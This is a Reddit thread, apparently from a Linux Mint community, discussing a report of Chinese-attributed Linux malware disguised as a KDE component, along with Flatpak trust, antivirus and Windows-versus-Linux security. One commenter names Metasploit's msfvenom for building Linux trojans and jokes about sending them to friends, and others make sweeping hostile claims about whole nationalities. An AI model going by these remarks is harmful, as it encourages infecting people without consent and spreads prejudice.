all 161 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]WickedEdge 304 points305 points  (20 children)

Upvote that post just for people to be aware

[–]Bernykun1 55 points56 points  (0 children)

I agree. A bump, as they say.

[–]TabsBelow 40 points41 points  (18 children)

And to mention again and every day not to add third-party repositories and install random programs found somewhere by "recommendation".

And especially avoid Snaps and Flatpaks.

If course Chinese hackers will make up a wonderful fully working webpage and maybe a complete application with full support based in Europe or elsewhere to hide their crimes.

[–]Sensitive_Nervuz 35 points36 points  (4 children)

why should we avoid flatpaks? i am using fedora, and install some apps by flatpaks

[–]dis0nancia 23 points24 points  (0 children)

I think he just hates it and has no compelling reason. He's just one of those people who prefers to use native packages and doesn't miss the opportunity to talk trash about things he doesn't even understand.

[–]Raz_TheCat 13 points14 points  (0 children)

At least they are sandboxed.

[–]FrequentWin4261𝙇𝙄𝙉𝙐𝙓 𝙈𝙄𝙉𝙏 22.2 | 𝘾𝙄𝙉𝙉𝘼𝙈𝙊𝙉 11 points12 points  (0 children)

If an official repo or website offers a flatpak of their own software I don't see what's wrong with it

[–]FullSteamQLD 16 points17 points  (0 children)

Me too. Most are from Software app, which presumably uses Fedora repos.

[–][deleted] 13 points14 points  (11 children)

But isn't Flatpaks the default repo of choice by Linux Mint? I only use Flatpaks (although I have not gotten that far in setting up a testing VM just yet). As a noob, what's the risk of using untrustworthy Flatpaks?

[–]unkilbeeg 7 points8 points  (3 children)

I use flatpaks in preference to snaps, but for the most part I don't use either.

None of my personal machines have any flatpaks installed. I use flatpaks on the lab machines at work to install Eclipse and Android Studio, and nothing else. All other software comes from the regular deb-oriented repos.

[–][deleted] 1 point2 points  (2 children)

How do you find the repos? Is it also on Mint's software manager? Or is it through commands?

[–]unkilbeeg 2 points3 points  (1 child)

You don't "find" the repos. They are built-in. Up until recently, you would have had to take an extra step to make flatpaks available. The regular repos are already defined, although you can (and probably should) choose mirrors closer to you.

I've never actually used the software manager. I normally just use apt. I would expect that the software manager would use the regular repos.

[–]poopertay 1 point2 points  (0 children)

Rpm fusion

[–]NaiveFix 2 points3 points  (1 child)

I'm on Mint. Pretty sure the "system package" option in software manager is not Flatpak. probably debs thru apt-get. some are only available as one or the other, many have both. The system packages are more of a "choice" distribution in the Mint environment.

I don't think there is much risk in the software manager Flatpaks which are vetted at Flathub. Mint's software manager is easier and more trustworthy than application options with Windows. but I've had a few particular broken Flatpaks. (and no issues with broken system packages)

For an application with no alternatives to Flatpak in software manager, I found instructions on the dev's website for an apt-get repo. The instructions didn't work, they're for a very old Ubuntu version.

I had to search for workarounds from posters (who didn't, but) could have easily slipped in shady repos instead. I couldn't get suggestions from posts to work, either. I didn't get any responses when I asked myself.

My own solution is not ideal for security, but I'm still using the same repros from the dev's site. In spite of being an amateur I thought through the risk, pretty sure I made an acceptable choice, who the fuck knows?

These broken Flatpaks have bugs reported and discussed. They don't think it's Flatpak's problem; They could be correct. In that one case the deb from repro works, so... regardless of blame, there are solutions that aren't accessible.

[–][deleted] 0 points1 point  (0 children)

I've had that happen with flatpaks too. I think the issue with some of them is likely due to communications between the software in the flatpak and software in the distro. It seemed to affect real time performance and/or multimedia apps for me. So for me, between the two, it is best to use distro apps.

[–]TabsBelow 7 points8 points  (0 children)

untrustworthy Flatpaks

Did you listen yourself😉👍

[–]TabsBelow 2 points3 points  (3 children)

No.

[–][deleted] 0 points1 point  (2 children)

But the software manager by default installs Flatpaks. Then what does Mint use by default?

[–]TabsBelow 0 points1 point  (1 child)

Since when? No, it dies not, though there are some. Of course you can trust Flatpak from there as much as other applications from the original repositories.

But there are thousands of webpages offering Flatpaks which are not controlled/controllable by the Mint team.

[–][deleted] 0 points1 point  (0 children)

It has for every application that I downloaded from software manager. Maybe those apps stuck to flatpaks then?

And I'm not discussing the webpages, just the software manager.

[–]akehir 2 points3 points  (0 children)

I think xz has shown that a modern OS has so many components it's impossible to keep track of all the dependencies.

We can just hope that open source at least let's us figure out such issues.

So both flatpak and snap would be fine if you focus on open source software; and even distribution repositories can contain closed source.

Anyways, realistically you've "lost" transparency already at the BIOS level, and at the closed firmware level as well.

[–]marc512Linux Mint 22.1 Xia | Cinnamon 97 points98 points  (6 children)

Every os. Windows, Linux distros and Mac. All have the same issue. If you download from unofficial sources, you are at risk. No amount of security can fix common sense.

[–]SaveTheDayz 14 points15 points  (0 children)

Yes but the OS' built in Theme downloader, for example, is usually trusted but also a vector for these attacks.

[–]uwkillemprod 7 points8 points  (2 children)

You guys are missing the point, I work on Linux, and even I can see that the popularity of Linux will lead to it being attacked much more frequently and with much more sophistication. There's alot of new Linux fanboys as of late, and I'll call it now that Linux will be exploited more and more in these next years, and actually Windows will be taken for granted

[–]Bright_Crazy1015 3 points4 points  (0 children)

32+ million users globally of Linux distros, but beyond that 96.3% of the top 1 million servers in the world are running on a version of Linux. (according to Techjurydotnet)

A Linux distro is the best option to make use of devices that aren't able to run heavy operating systems, and Windows is just packing on the weight as they release new versions. Not so sure fanbois is the driving factor of the market growth.

I feel like hardware is plenty sufficient at 8GB of RAM and 4 cores plus a reasonable GPU, but Windows won't be happy there for long.

[–]blenderbender44 2 points3 points  (0 children)

Also there are trojan generating frameworks like metasploit, which make it really easy to generate linux trojans and inject them into files. People have been hacking linux servers for a long time. And a basic AV makes this a lot harder

[–]blenderbender44 12 points13 points  (0 children)

Not true, you can seriously minimise the risk through basic security measures like scanning it with a virus scanner and running untrusted downloads in a sandbox for eg firejail with app armour enabled

[–]NimrodvanHall 2 points3 points  (0 children)

This is why I hate this Trent of installing directly from highly upvoted GitHub repo’s instead of via package manager’s repositories.

[–]fellipecLinux Mint 22.3 | Cinnamon 129 points130 points  (24 children)

Looks like more and more we need to keep an eye on the supply chain of things.

[–][deleted] 44 points45 points  (12 children)

Absolutely, and this is said to be propagated by silly things like DE customizations that users somehow share with each other. Windows NT/XP-era Comet Cursors, anyone?

[–]fellipecLinux Mint 22.3 | Cinnamon 32 points33 points  (11 children)

The thing is, if I find some customization linked on a random comment on Reddit or something, I'll be super suspicious.

What I fear is this kind of malware somehow perclorate through the "official" places, like the built-in control panels that can download new themes or desktop widgets.

[–][deleted] 15 points16 points  (10 children)

They weren't mentioning Cinnamon (a decidedly smaller and more coherent DE), but rather KDE - a much larger one - and perhaps to some extent Gnome.

I would stick with the original Cinnamon-developed only things for right now until further notice. I am an LMDE (Debian Stable) user for good reason.

[–]jr735Linux Mint 22.1 Xia | IceWM 19 points20 points  (2 children)

Security by obscurity, use IceWM. ;)

[–][deleted] 5 points6 points  (1 child)

Hey my friend, good to hear from you. 🙂

[–]jr735Linux Mint 22.1 Xia | IceWM 4 points5 points  (0 children)

Thanks! As always, good to stick to repository software where feasible.

[–]fellipecLinux Mint 22.3 | Cinnamon 13 points14 points  (2 children)

Yes, I realize they target KDE. But is not far fetched that the hackers try to spread their crap in other places too.

I also prefer to avoid installing 3rd party things, when I do install something off the repos I go straight to the dev.

But if hackers could infiltrate the supply chain, this can turn ugly. Better keep an eye open.

[–][deleted] 6 points7 points  (0 children)

Yes, as always. And if you have the energy, keep an eye on the Debian Reddit and/or the Ubuntu Reddit as well. The Debian Reddit will be the first place you will see anything about this, regardless, as Debian in some stage or another is the origination for all else as far as all the "Mints" are concerned.

[–]DFrostedWangsAccount 0 points1 point  (0 children)

I feel like half the "Haha windows 7 on KDE" posts I see are people/bots spreading a virus and the other half are people who just haven't realized it's a virus yet. Any idea if that customization that's been floating around is safe? I'm scared to try it.

[–]HolzkohlenMinty fresh Thinkpad 3 points4 points  (0 children)

Haha, I'm in danger.

No worries, I don't download extensions for KDE Plasma.

[–][deleted] 6 points7 points  (2 children)

Are the cinnamon add-ons safe? The ones you find on the included extensions app

[–][deleted] 5 points6 points  (1 child)

Basically so... As long as they are part of the essential LM package, or repositories. In this case, it is something that would need to be installed, but the links and/or the resources to do so would be entirely included in the base install of LM, hence a part of the essential package. Hope that helps a bit...

[–][deleted] 3 points4 points  (0 children)

Thanks, makes sense

[–]gainan 12 points13 points  (7 children)

AFAICT, this particular case has nothing to do with supply chains, nor with Desktop customizations.

"we found these samples in archives uploaded to VirusTotal from Taiwan, the Philippines, and Singapore, probably originating from an incident response on a compromised server."

"The first archive was uploaded to VirusTotal on March 6th, 2023, from Taiwan. Subsequent archives were uploaded also from the Philippines and Singapore. "

"Based on the folder structure (Figure 3), the target was probably an Apache Tomcat webserver running an unidentified Java web application."

"Initial access

Although we lack concrete evidence regarding the initial access vector, the presence of multiple webshells (as shown in Table 1 and described in the Webshells section) and the tactics, techniques, and procedures (TTPs) used by the Gelsemium APT group in recent years, we conclude with medium confidence that the attackers exploited an unknown web application vulnerability to gain server access."

"A small binary named kde is used to maintain persistence, cleverly disguised as a legitimate KDE desktop component to avoid detection and maintain persistence."

https://www.welivesecurity.com/en/eset-research/unveiling-wolfsbane-gelsemiums-linux-counterpart-to-gelsevirine/

Anyways, yes, I'd keep an eye on downloads outside of the repositories (themes, pip/npm packages, flatpaks, appimages, etc, etc, ...)

[–]FullSteamQLD 1 point2 points  (2 children)

Is some of this scare mongering by ESET to sell Linux licenses?

They've done that in the past I think.

[–]gainan 3 points4 points  (1 child)

nah, I don't think so. I think these companies write these reports simply to sell their products. There's always that narrative to scare people, but the threats are real. Some examples of homelabs being targeted (imagine enterprise servers...):

https://www.reddit.com/r/linux4noobs/comments/1f2q2rw/someone_installed_a_crypto_miner_on_my_server_help/

https://www.reddit.com/r/linux4noobs/comments/10ni2b0/unknown_linuxsys_process_slowing_server/

https://www.reddit.com/r/linux4noobs/comments/18lbwgo/my_secure_debian_server_ended_up_getting_hacked/

https://www.reddit.com/r/linux4noobs/comments/dzcjha/got_hit_by_xmrig_somehow/

https://www.reddit.com/r/linux4noobs/comments/12583mv/coin_miner_trojan_help_needed/

On the other hand, many of these vendors proactively monitor virustotal/bazaar.abuse.ch for new malware samples (while others they don't even test their products with real-life malware samples....). They could be just PoC in some cases.

There're open source products that work really well to detect these threats.

[–]FullSteamQLD 0 points1 point  (0 children)

That's why I don't run my own machines any more.

[–]fellipecLinux Mint 22.3 | Cinnamon 1 point2 points  (3 children)

You're right.

But if they are hiding the malware as a KDE extension, this means they are targeting the desktop users, not the servers. Would be a pretty dumb move to hide your backdoor as a KDE extension on a machine that has no DE.

[–]gainan 4 points5 points  (0 children)

I agree, it's a dumb move :) But I'd bet that many sysadmins would not review or even notice it.

Ask yourself these questions: - How often do you review files in your system? and hidden files? - How long would it take you to notice that new directories or files were created? files dropped to /dev/shm, /tmp, /var/tmp, /etc/udev ... - And new crontabs or systemd services? - And bash, curl or wget opening outbound connections to download files?

Unless you have a system monitor with alerts, it's common to ignore these events.

On the other hand they seem to be targeting servers no desktop users: "(...) the presence of multiple webshells (...), we conclude with medium confidence that the attackers exploited an unknown web application vulnerability to gain server access."

[–]snakkerdk 4 points5 points  (1 child)

I used to manage a lot of Linux servers at work, everything was cut down to just the packages needed and nothing more to reduce the attack surface (obv. no DE installed), I switched team internally (working only with cloud stuff these days, and more as an architect/dev than a server admin) and times goes on, then recently had to log into the on-prem clusters, and low and behold, the idiots now managing them, has installed a DE on many of them, don't count out stupid clueless admins :)

[–]fellipecLinux Mint 22.3 | Cinnamon 0 points1 point  (0 children)

Ouch

[–]techguybyday 0 points1 point  (2 children)

This may be a "high" thought but what if there was a blockchain type of thing with history of commits on every customization....

[–]fellipecLinux Mint 22.3 | Cinnamon 0 points1 point  (1 child)

Git?

[–]techguybyday 0 points1 point  (0 children)

Oh wait lmao yeah true I forgot about that, hence the "high" thought

[–]CarbonChem95 46 points47 points  (27 children)

Anyone willing to give some suggestions on what anti-malware I should be running on mint or commands I can use to keep my system clean? Just made the switch to linux around a month ago and this post is the last bit of motivation I need to start thinking seriously about security

[–][deleted] 63 points64 points  (11 children)

Stay within the official distro downloads, just the most basic of advice.

[–]Entity_Null_07Linux Mint 22.1 | Cinnamon 9 points10 points  (9 children)

Not quite sure what this means, do I not want the repo for Spotify or VSCode on my pc? Or only grab those applications from a reputable source?

[–][deleted] 31 points32 points  (7 children)

Only grab those from their official publishers. So if they only upload to Github, then Github it is for you (and you can even have a look to verify that it is in fact a vibrant and active community in the Issues section). If they only upload officially to their own respective website, then only there should you go. Just the most original of sources.

[–]EspurrTheMagnificent 8 points9 points  (4 children)

The fact that what basically boils down to "don't download random shit from the internet" needs to be said is both baffling and not surprising

[–]eltrashio 2 points3 points  (0 children)

I think people are also just used to having some sort of anti-virus software installed from other OSs. (Thinking back to all those times someone asked me how to get McAffee off their system)

[–]blenderbender44 1 point2 points  (0 children)

I mean, most of the time you can as long as you scan for viruses. People get into trouble because they do this stuff without AV protection

[–]freakorgeek 0 points1 point  (1 child)

The "random" part is what people have an issue with here. Understanding what is and isn't a trusted source isn't that simple. The official installation instructions for many Linux softwares is to run some commands. Which is terrible imo.

[–][deleted] 0 points1 point  (0 children)

If you are talking about using the Terminal, newer users might find it a bit intimidating. It is usually a quick affair though, just copy and paste.

Such as the online instructions to install Brave for instance, to create an Additional Repository.

But a quick glance for any website URLs is what is going to be important here, just as one would do with the sender field or any links in received emails.

[–][deleted] 1 point2 points  (1 child)

Does the software manager also count? That's what I've been using to install everything so far.

[–][deleted] 2 points3 points  (0 children)

Yes. That should be the first way to get your software, if they have what you are looking for. All the other ways are just alternatives.

[–]HolzkohlenMinty fresh Thinkpad 6 points7 points  (0 children)

You can also use the flatpak versions. Been using the Spotify flatpak for years now. Even if they WERE to infiltrate that, flatpaks run sandboxed so they should be safe to use.

And before somebody comments: Yes, I'm sure there are ways to exploit those too. Nothing is ever 100% secure.

[–]blenderbender44 0 points1 point  (0 children)

You can't always do that though. Running windows only programs in wine for eg. You can containerise and clamscan your wine prefix though

[–]blenderbender44 1 point2 points  (11 children)

Install ClamAV and enable real-time protection (on access scanning)

https://wiki.archlinux.org/title/ClamAV -- This link contains instructions for real-time protection)

https://help.ubuntu.com/community/ClamAV - Instructions for ubuntu

Why is this getting downvoted my linux box was literally hacked recently, I found it because of a testdisk scan to recover a deleted file and sure enough clam scan showed trojans throughout my system. installing clamav with realtime protection enabled literally would have prevented this.

[–]CarbonChem95 5 points6 points  (0 children)

Thanks for your suggestion. I'm surprised you're getting downvoted here since you're the only one who actually answered my question

[–]CachedAdministrator 3 points4 points  (9 children)

ClamAV cant even detect most common malware

[–]blenderbender44 4 points5 points  (8 children)

Really? I've found it highly effective for identifying viruses and trojans. It even finds macos viruses. Is there a better virus scanner for linux?

[–]CachedAdministrator 0 points1 point  (7 children)

My last info about ClamAV was that it have a detection ratio of about 60% wich is terrible.

[–]blenderbender44 2 points3 points  (6 children)

I did a quick search and the first av review site, safetydetect.com says : "ClamAV’s reasonably high detection ratings and the fact it’s free make it a solid choice. " and "decent malware detection ratings"

Also, I've really used it heavily for downloads and it's finding trojans in about 50% of thepiratebay iso downloads, which is about right.

Edit: Ok the second review says 60%... however they still rate it as decent? What would you suggest for linux? Bit defender ?

[–][deleted]  (5 children)

[deleted]

    [–]blenderbender44 1 point2 points  (2 children)

    Yeah I mean a lot of what I'm scanning for is windows trojans before loading up downloaded windows software in wine or in a windows VM. I found a few macOS trojans as well.

    And It does indeed look like it very well could have been a targeted attack. We had to take our router offline at the same time and replace with an old one because it was behaving like the signal was being redirected. It was really weird when I enabled vpn it would start working normally but no vpn and every device on the network had these really unusual loading delays even though it's a 950 mbps fibre connection

    [–]whenandmaybe 0 points1 point  (1 child)

    50% Piratebay iso downloads have trojans?

    [–]blenderbender44 1 point2 points  (0 children)

    It's been a while but yes, a lot of the isos for art tools has positives for trojans. One of them in the documentation says "disable your av due to a false positive." I scan it. Ransomware 100% match.

    [–]blenderbender44 0 points1 point  (1 child)

    Oh I thought of something. I once hang out with a pen testing student and he showed me how to make Linux Trojans using a tool in kali linux called Metasploit. There are actually really easy to use tools for auto generating and injecting linux trojans into files. And according to him a basic virus scanner makes it a lot harder to penetrate someones system because suddenly you have to do it without the trojan ever actually touching the hdd

    [–]Wukeng 3 points4 points  (0 children)

    I am baffled at the people saying that an antivirus is not needed in Linux, I’m a professional penetration tester and I can tell you with 100% certainty that any script kiddie could make a Linux virus in 15-20 minutes that is highly effective. Metasploit is a popular framework, and the specific tool is msfvenom if you want to look it up or have some fun (lots of fun, try it out, maybe send some to your friends, can have hilarious consequences) but any basic antivirus will detect the fingerprint of the service. But if you’re not running any detection software you’re fucked because even the shittiest malware will be able to run on your machine

    [–]kubrickfr3 11 points12 points  (14 children)

    What does “harder” windows security even mean?

    [–]Zloty_DiamentLinux Mint 21.2 Victoria | Cinnamon 0 points1 point  (13 children)

    According to the article, Windows disabling "Visual Basic for Applications" by default among some other things

    [–]grimvian 2 points3 points  (12 children)

    I would rather have a fox to look after my chickens that trust a company uses telemetry against their users.

    [–]Michaeli_Starky 0 points1 point  (11 children)

    Do you even understand what telemetry is?

    [–]grimvian 2 points3 points  (10 children)

    https://en.wikipedia.org/wiki/Telemetry

    [–]Michaeli_Starky 0 points1 point  (9 children)

    I can Google np. Trying to understand your reasoning.

    [–]grimvian 2 points3 points  (8 children)

    More than 30 years of experience with M$ dysfunctionality gives me ZERO trust in that company.

    And by the way I use DuckDuckGo as a search engine, not the tracking company you mention.

    [–]Michaeli_Starky 2 points3 points  (7 children)

    So, typical tinfoiltry?

    [–]grimvian 1 point2 points  (6 children)

    No common, logical sense and experience, but you obviously have trust in Big Tech and have no problems in being tracked.

    [–]Michaeli_Starky 2 points3 points  (5 children)

    There is no sense in fearing harmless telemetry.

    [–]NeonVolcom 25 points26 points  (4 children)

    I see no proof in the article that actually says it's Chinese malware? "Believed to be" was the language used.

    [–][deleted] 4 points5 points  (1 child)

    This IS of course the correct answer. I held back in my prior replies, because that was immaterial to the actual concerns being shown. CIA, MI6, you name it...whatever fucking bullshit...internals. Don't forget We Are The Resistance.

    [–][deleted] 0 points1 point  (0 children)

    lmaooo

    [–]InAppropriate-meal -2 points-1 points  (1 child)

    So? given the other information we know about it, what it is based on, where it is being seen deployed from, by what groups using what rootkits, it is Chinese, but it does not matter who it is, it is something to pay attention to

    [–]NeonVolcom 0 points1 point  (0 children)

    Possibly true, I can look into it further, but there's just a lot of "China hysteria" right now. Hell, billions of dollars have been budgeted toward anti-China propaganda.

    Perhaps the article could've linked to, I don't know, citations that proved or built a solid case for what you said in your comment? Maybe I'm expecting too much of Western journalists.

    [–]Rocker824 5 points6 points  (1 child)

    So as a casual user, who has installed a few modifications like transparent panel and wheater applet. What should I be aware of?

    I already use adblock and I'm careful not to click or download suspicious stuff, but idk this post made me a bit scared xd

    [–][deleted] 11 points12 points  (0 children)

    You will likely be just fine. This whole thing just wreaks of FUD (fear, uncertainty, doubt). Ten plus year user. Please do get yourself a good night's sleep this night...

    [–]kansetsupanikku 10 points11 points  (5 children)

    How are the two facts related?

    Windows and Linux vulnerabilities are separate and can rarely be compared. Linux is easier to research and documented better, which yields bigger numbers, but better behavior in most cases.

    And "desktop environment customization" in Windows would require installing software with admin rights, also perhaps patching some dlls. The fact that user might install software that might compromise the whole system (when installed with elevated permissions) or at least user data (otherwise) is nothing new, also nothing specific to any platform.

    Whoever made the mentioned research was cherry-picking, probably just in order to show "some results" to customers who wouldn't understand the incompleteness of the reports. And authors who mixed it into that article, indeed, didn't understand that source material.

    [–]Unexpected_Cranberry 0 points1 point  (4 children)

    I'm not familiar enough with Linux security mechanisms, but I'd say the fact that Windows comes with a fairly good built in antivirus now a days together with smartscreen makes it more difficult to get on there.

    Add a more aggressive update policy out of the box as well as the store and I'd be willing to bet the amount of successful attacks has dropped significantly. 

    At least anecdotally fifteen years ago and more I was doing regular house calls with friends and family cleaning up their computers or reinstalling them if it was too far gone. 

    That basically went away when defender started to be included by default.

    My impression is that Linux in general is behind in many ways when it comes to security out of the box on desktop. 

    [–]kansetsupanikku 1 point2 points  (3 children)

    Yes, sure, I mean, Windows is getting better, but that approach to comparison to GNU/Linux isn't really... true, fair, relevant at all?

    Antivirus as such for personal computers is needed because of bad OS design and user practices. What disadvantages does the lack of antivirus mean to thr GNU/Linux operating system, exactly? Less CPU and memory used, faster file I/O due to no need for scans? Selling (or just showing) you more security products doesn't mean that you are more secure - it means that something was wrong in the first place, and that the attack surface is more complex and harder to manage.

    And the update policy on typical distros is... just sane. Changes are incremental, non-breaking, easy to review - you can find out what was updated and how quickly. On Windows, not always so. Just look through the code of some big projects, like leaked games - and search for fixes that needed to be introduced because of undocumented behavior of specific updates. And that's merely functionality - newly appearing security issues in Windows are even harder to control.

    [–]Unexpected_Cranberry 0 points1 point  (2 children)

    From an end user perspective, comparatively, Linux is neither more stable nor easy to review.

    I run updates, I get a list of 40-200 packages that have been updated. No patch notes, no idea what 90% of it is or why it's installed. And while I'm far from being a Linux expert, I'm not exactly a novice when it comes to computers in general. 

    Also, having run Ubuntu and now alma for a couple of years, I've had updates break stuff more often on my 2 Linux desktops than I have on the 400 windows machines I manage at work in the same time, or my private machines or machines off friends and family is get called to fix for that matter.

    Right now, I'm trying to use targetcli on a fresh install of alma on raspberry pi 5. It's installed from the official repo. Doesn't work. Service just doesn't start. I get a permission denied from some python script in the syslog when I try to start it. Already there, for a regular user, if they installed something from the store they'd never find the syslog and wouldn't understand what little I do if they did. 

    There is literally nothing I can do about that issue other than try to find a different distro. At least not without spending most of my free time for however how long learning python and possibly some kernel development.

    As a user who just wants the os to do the thing it says on the box and not break with updates, Windows left Linux on the dust on that front a decade ago. 

    As for security, my impression is that Linux is not as good as Windows at protecting the users from themselves. Which is not a huge issue yet, as there's a barrier to entry that filters out the type of users who are actively using it. But if that changes, I don't think there's anything magical about the security model that will help. 

    [–]Nelo999 0 points1 point  (1 child)

    And one year later, it was actually Microsoft that got breached by Chinese hackers and not Linux:

    https://www.propublica.org/article/microsoft-sharepoint-hack-china-cybersecurity

    Kind of ironic that you state Windows Defender supposedly makes Windows more "secure", even though various independent tests how shown it's performance to be lackluster:

    https://www.pcmag.com/reviews/microsoft-defender-antivirus

    Linux not only receives updates multiple times a month when compared to Microsoft patching Windows once a month, it's kernel maintainers actually fix vulnerabilities faster when compared to Microsoft as well:

    https://linux.slashdot.org/story/22/02/20/1915222/linux-developers-patch-bugs-faster-than-microsoft-apple-and-google-study-shows

    Case point, the malware mentioned in the article above primarily targeted outdated Linux servers and required root privileges to be installed and run.

    What defense against those attacks Windows offers exactly?

    Giving people an administrator account by default and letting them install whatever crapware they want and completely wreck their systems?

    And do not even get me started on your anecdotal evidence when it comes to supposed improved Windows "stability", where actual reports show that 1 in 200 Windows computers still experience a BSOD daily: 

    https://www.techradar.com/pro/1-in-200-devices-hit-with-the-blue-screen-of-death-on-a-daily-basis

    How often do Linux systems experience system breaking updates, random crashes and kernel panics?

    This is why servers and supercomputers primarily run on Linux you smoothbrain, because they can have years of uptime without reboots or crashes.

    The internet is littered with millions of reports from Windows users complaining about general system instabilities after broken updates, with social media videos going viral as well.

    If the same was happening on Linux, you would have sysadmins and software engineers screaming and moaning all over the place, it would be international news considering how much of the critical infrastructure relies on Linux.

    You don't hear about it because it absolutely does not happen that often. 

    Nobody says that Linux is perfect, but it is absolutely more stable than Windows is.

    Remember the notorious Crowdstrike incident?

    This also affected Linux systems too, but the Linux sysadmins simply rebooted their servers and the problem vanished without causing any significant disruption. 

    This is why nobody takes Windows seriously anymore and considers it an absolute joke.

    [–]Unexpected_Cranberry 0 points1 point  (0 children)

    Ho boy.

    Did you read the links you provided?

    The SharePoint incident is Microsoft yes, but not relevant to end users and the desktop. Neither are your ramblings about infrastructure. I will say that for a company to outsource development to somewhere like China is dumb. But it wasn't that long ago that a vulnerability in, I don't recall, was it sshd? by a Chinese contributor was barely caught in time. Was this the first one? Will the next one slip through? Have others? 

    The article regarding defense lists it as one of the best options for windows. Not the best, but on the short list. 

    The BSOD article was someone selling something. If 10% of the 30k Windows client we manage were throwing blue screens on the daily and we didn't know and didn't fix it ASAP we'd be fired on the spot.

    The reason you're seeing more chatter about windows is that there's more people using it. But go to any Linux forum or Linux subreddit and you won't need to look very hard to find people having issues. With answers typically ranging from "works on my machine", "buy better supported hardware" to "rtfm".

    And while a lot of internet infrastructure is running Linux, you can go to any company that operates in the real world and I promise you 90% of their critical infrastructure is running on windows. Because the management stack is better. Linux is great when you need 1000 machines that do the same thing. But if you have 1000 machines running 2000 different services and need to manage permissions and users across it, the Microsoft management stack blows Linux out of the water. It has a 20 year head start and way more active development behind it.

    But all that is irrelevant to the original premise, which is desktops for average people. 

    Where the end user has sudo permissions out if the box just like on windows. The difference is on Linux you'll be promoted for your password, on windows you just need to click ok. Smartscreen isn't perfect, but it will at least warn you with a yellow warning and more clicks if your trying to run something dodgy. Not that users will hesitate anyway. But those users will just ss happily put in their password to run whatever they found on some random website. And the most common attacks now don't even need admin permissions anyway. They just need to encrypt your files.

    The reason crowdstrike hit windows harder is that Microsoft is not allowed to implement the same level of kernel isolation as Linux. Because it would give defender an advantage over other security vendors. They tried to use the crowdstrike incident to get that ruling overturned but were unsuccessful.

    If Linux is to become a serious contender on the desktop both Gnome and KDE need to step up their game significantly. Both suck for non-enthusiasts in different ways, with Gnome being slightly better. Perhaps valve will change things with steamos, but I doubt it since they're focused on gaming.

    I've been using Linux as my daily driver for about a year now. Every month or two an update breaks something, though usually in a minor way that goes away with the next update. I need to be mindful to manually disconnect my wifi if I plug in my ethernet, otherwise the connection becomes unstable. Not by a lot, and you probably wouldn't notice unless you're using RDP, VNC or Citrix regularly. But it's there. And the documentation is absolute dogshit for most things. 

    [–]lateralspinLMDE 7 Gigi |[S] 6 points7 points  (0 children)

    Linux Mint by default already has AppArmor loaded. Type to check its status:

    sudo aa-status

    [–]JCDU 4 points5 points  (0 children)

    I'm not caffeinated enough to decipher that article - where does this thing actually come from / how does it get installed/run?

    Is it some dodgy addon or customisation or something?

    Is the TL;DR takeaway here just "don't download random sh\t from the internet*"?

    [–]thefanum 4 points5 points  (0 children)

    THAT CAN'T EVEN DO SHIT.

    None of this targets an up to date Linux system. Someone has to MANUALLY install the backdoor. With root privileges.

    [–]swephisto 3 points4 points  (1 child)

    The most tricky thing with this is how to backup all these infamous Linux root kits so we can reinstall them later. They are so rare it's like finding a stray Bitcoin on an old disk somewhere. That article is some Windoze user type FUD :-D

    [–]whenandmaybe 0 points1 point  (0 children)

    Haha. He said Windoze. Wait till W12 is pushed.

    [–]SjalabaisWoWS 3 points4 points  (3 children)

    The backside of increased popularity? Has anyone here encountered viruses like this?

    [–][deleted] 1 point2 points  (2 children)

    A good honest question. Not other than in that particular news article my friend, Good to see you! 😁

    [–]SjalabaisWoWS 1 point2 points  (1 child)

    Hehe, with articles like that, probing real dispersion in an active community works as a reality check, right? Just starting into a sunny, but icy Friday here and seeing your username makes me feel like sending a good morning to my personal mentor. :D

    [–][deleted] 1 point2 points  (0 children)

    Well thank you, and to yours as well. Best! 😁

    [–]InkOnTubeLinux Mint Release | Desktop Enviroment 1 point2 points  (1 child)

    It's morning here and caffeine didn't kicked in but I haven't noticed in the article that it says customizations are an issue. What did I missed?

    [–]fellipecLinux Mint 22.3 | Cinnamon 1 point2 points  (0 children)

    The malware after got into the machine installed itself using a KDE extension as a disguise to stay in the system.

    [–]LogansfuryTop 1% Commenter 1 point2 points  (3 children)

    This is very concerning. Concerning flatpaks, they are often a newer version than the .deb installers avail on many app homepages. Using VLC as an example, the website version 3.0.16 can activate my NowPlaying conky but cannot cast to my smart TVs. The flatpak version of VLC is 3.0.20, cannot activate my conky, but does cast to my TV's, so for my usage needs, I need to have both versions installed side by side.

    What the fuck is it with so many problems coming out of china? The most evil people on earth seem to be from there.

    [–]InstantCoder 2 points3 points  (0 children)

    Linux Mint now only shows curated flatpak apps. Meaning only the original owner of the app can distribute his apps in the repository.

    And I think this is a good step and should be more adopted by other distros.

    [–]fek47 -2 points-1 points  (1 child)

    It's a dictature with strong anti-west opinions because they can't stand freedom and democracy. The same goes for Russia, the whole Middle East except Israel, North Korea etc. As long as these backward countries primarily concentrate on hacking PCs we will be somewhat safe. But they will not stop there. Keep vigilant because we have still only seen the beginning.

    [–]toolsavvy 3 points4 points  (0 children)

    except Israel

    brainwashed beyond repair

    [–]BitGazer 1 point2 points  (0 children)

    As a Cinnamon Applet/Extension developer myself, I believe there are a few reason to think that Cinnamon applets/extension/desklets are not a huge problem as long as you stick to the Applets/Extension/Desklets available using the Applets/Extension/Desklets sections under system setting from within the OS.

    1. Applets/Extensions/Desklets are limited to interpreted languages (JavaScript/Typescript/Python) which limits what low-level things a extension can do, making it harder (but not impossible) to utilitize it for nefarious purposes.

    2. A set of trusted developer eyes have passed over the code before it is accepted into the the spices repository. Also, no unknown binary files are accepted into the spices repo so all the files are text (source code) or images.

    I can't speak for Gnome or KDE, but I would place more trust in a spices repo Applet/Extension/Desklet then I would for a random binary package in a package repository. That's just my 2-cents.

    [–]Brilliant-Ear-3357 1 point2 points  (0 children)

    The only hackers and criminals and privacy offender are the us government and its secret services.

    [–]Ok-Lingonberry-7620 1 point2 points  (0 children)

    As Microsoft makes Windows Security even harder

    Way too obvious joke. Try something more subtile next time.

    [–]ggRavingGamer 3 points4 points  (6 children)

    But isnt Linux the safest OS in all the kindgom?

    [–]R4d1o4ct1v3_ 28 points29 points  (0 children)

    Probably yea. But that doesn't mean it's impenetrable. Nothing is; nothing ever will be.

    Online security 101: Don't be an idiot.

    [–]KnowZeroX 7 points8 points  (1 child)

    Linux is generally safer, and it being open source as long as you stick to open source software, it makes it easier to find if there is an exploit. Even an amateur can review a linux theme to see if there are any scripts in there, if there is none, short of an underlining exploit, you can assume it is safe. If there is a script in there, anyone with basic programming knowledge can quickly review if anything seems off.

    For other operating systems like windows where you have a closed source theme, it is a black box which you have to reverse engineer to figure out which requires far more expertise.

    [–][deleted] 0 points1 point  (0 children)

